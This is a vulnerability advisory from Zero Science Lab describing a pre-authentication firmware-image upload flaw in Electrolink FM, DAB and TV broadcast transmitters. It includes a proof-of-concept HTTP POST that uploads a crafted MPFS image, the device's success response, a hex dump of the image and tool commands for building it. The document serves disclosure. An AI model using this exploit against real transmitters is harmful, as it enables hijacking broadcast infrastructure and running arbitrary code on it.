Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution

Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code ExecutionVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The device allows access to an unprotected endpoint thatallows MPFS File System binary image upload without authentication.The MPFS2 file system module provides a light-weight read-onlyfile system that can be stored in external EEPROM, externalserial Flash, or internal Flash program memory. This file systemserves as the basis for the HTTP2 web server module, but is alsoused by the SNMP module and is available to other applicationsthat require basic read-only storage capabilities. This can beexploited to overwrite the flash program memory that holds theweb server's main interfaces and execute arbitrary code.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5796Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.phpRef: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html30.06.2023--POST /upload HTTP/1.1Host: 192.168.150.77:8888Content-Length: 251Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=----joxypoxyUser-Agent: MPFS2_PoC/1.0cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: Login=IgnoreMePlsKtnxConnection: close------joxypoxyContent-Disposition: form-data; name="i"; filename="MPFSimg.bin"Content-Type: application/octet-streamMPFS...<CGI BINARY PHONE HOME>-----joxypoxy--HTTP/1.1 200 OKConnection: closeContent-Type: text/html<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>---hd htm:0d 0a 4d 50 46 53 02 01  01 00 8a 43 20 00 00 00  MPFS.......C....2b 00 00 00 30 00 00 00  02 44 eb 64 00 00 00 00  +...0....D.d....00 00 69 6e 64 65 78 32  2e 68 74 6d 00 3c 68 74  ..index0.htm.<ht6d 6c 3e 0d 0a 3c 74 69  74 6c 65 3e 5a 53 4c 3c  ml>..<title>ZSL<......64 6f 73 21 0d 0a 3c 2f  68 74 6d 6c 3e 0d 0a 2d  dos!..</html>..----MPFS Structure:     [M][P][F][S]     [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files]     [Name Hash 0][Name Hash 1]...[Name Hash N]     [File Record 0][File Record 1]...[File Record N]     [String 0][String 1]...[String N]     [File Data 0][File Data 1]...[File Data N]---C:\>javaw -jar MPFS2.jarC:\>mpfs2 -v -l MPFSimg.binVersion: 2.1Number of files: 1 (1 regular, 0 index)Number of dynamic variables: 0FileRecord 0:    .StringPtr = 32 index0.htm    .DataPtr   = 43    .Len       = 48    .Timestamp = 2023-08-27T14:39:30Z    .Flags     = 0